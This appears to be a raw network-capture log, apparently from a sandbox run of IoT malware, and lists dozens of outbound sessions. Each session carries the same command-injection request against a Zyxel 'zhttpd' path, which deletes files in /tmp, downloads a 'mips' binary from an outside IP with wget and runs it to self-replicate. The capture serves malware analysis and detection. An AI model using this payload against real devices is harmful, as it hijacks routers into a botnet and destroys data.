                              Mar 31, 2024 08:41:20.739131927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3584192.168.2.1351748212.127.115.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739183903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3585192.168.2.1340520115.1.247.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739216089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3586192.168.2.1358432206.203.93.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739245892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3587192.168.2.1348764206.20.115.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739284039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3588192.168.2.1333820125.232.254.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739332914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3589192.168.2.1355866163.32.83.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739383936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3590192.168.2.1338518132.248.151.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739424944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3591192.168.2.133653819.41.139.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739461899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3592192.168.2.1336340151.51.192.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739510059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3593192.168.2.135731424.231.94.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739540100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3594192.168.2.1358426149.76.216.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739583015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3595192.168.2.13413469.14.175.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739624977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3596192.168.2.134105899.4.208.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739676952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3597192.168.2.13556505.2.3.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739722013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3598192.168.2.13500904.153.248.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739762068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3599192.168.2.1335720182.107.243.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739799976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3600192.168.2.1338078105.18.151.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739857912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3601192.168.2.133578043.154.61.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739912033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3602192.168.2.1360244108.125.108.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739952087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3603192.168.2.1339052134.127.12.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.739973068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3604192.168.2.133747876.241.62.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740024090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3605192.168.2.1342930119.123.192.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740066051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3606192.168.2.1352666168.117.146.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740092039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3607192.168.2.13379262.214.127.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740130901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3608192.168.2.135560014.105.71.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740161896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3609192.168.2.133835695.251.178.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740226030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3610192.168.2.1352152100.212.192.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740263939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3611192.168.2.1348332197.34.193.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740314007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3612192.168.2.135050493.222.76.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740355968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3613192.168.2.1356172140.55.42.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740398884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3614192.168.2.1341158133.146.224.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740448952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3615192.168.2.134610491.51.184.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740497112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3616192.168.2.1351098111.122.63.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740545034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3617192.168.2.1350932160.117.171.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740602016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3618192.168.2.133964840.221.187.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740638018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3619192.168.2.133631443.170.112.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740696907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3620192.168.2.1333380105.199.145.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740740061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3621192.168.2.135216224.190.77.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740786076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3622192.168.2.1345128129.55.216.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740834951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3623192.168.2.135792470.244.82.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740874052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3624192.168.2.1338944118.225.9.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740910053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3625192.168.2.1339234207.229.252.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.740957022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3626192.168.2.1356012131.182.169.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741010904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3627192.168.2.134618666.203.231.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741050005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3628192.168.2.1354342206.39.95.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741089106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3629192.168.2.1358662173.34.54.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741138935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3630192.168.2.134859643.58.193.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741184950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3631192.168.2.135863662.194.131.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741208076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3632192.168.2.1343054180.227.156.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741265059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3633192.168.2.135847679.65.120.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741305113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3634192.168.2.135026867.44.22.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741343021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3635192.168.2.1343878177.48.239.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741405964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3636192.168.2.1357974178.6.216.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741427898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3637192.168.2.1348278113.115.201.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741486073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3638192.168.2.1340590185.229.169.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741508961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3639192.168.2.1359978211.51.89.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741586924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3640192.168.2.134636044.13.196.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741624117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3641192.168.2.1338156134.11.12.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741692066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3642192.168.2.1341480217.146.36.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741745949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3643192.168.2.134346479.120.201.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741806030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3644192.168.2.135085495.23.176.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741832018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3645192.168.2.1335360196.137.52.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741866112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3646192.168.2.1342488108.110.152.34443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741910934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3647192.168.2.1341446209.101.130.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.741950035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3648192.168.2.1333512186.219.142.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742010117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3649192.168.2.1355834116.44.96.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742053986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3650192.168.2.134152427.30.54.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742091894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3651192.168.2.134246867.125.4.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:20.742119074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3652192.168.2.135059431.60.192.159443
                              TimestampBytes transferredDirectionData
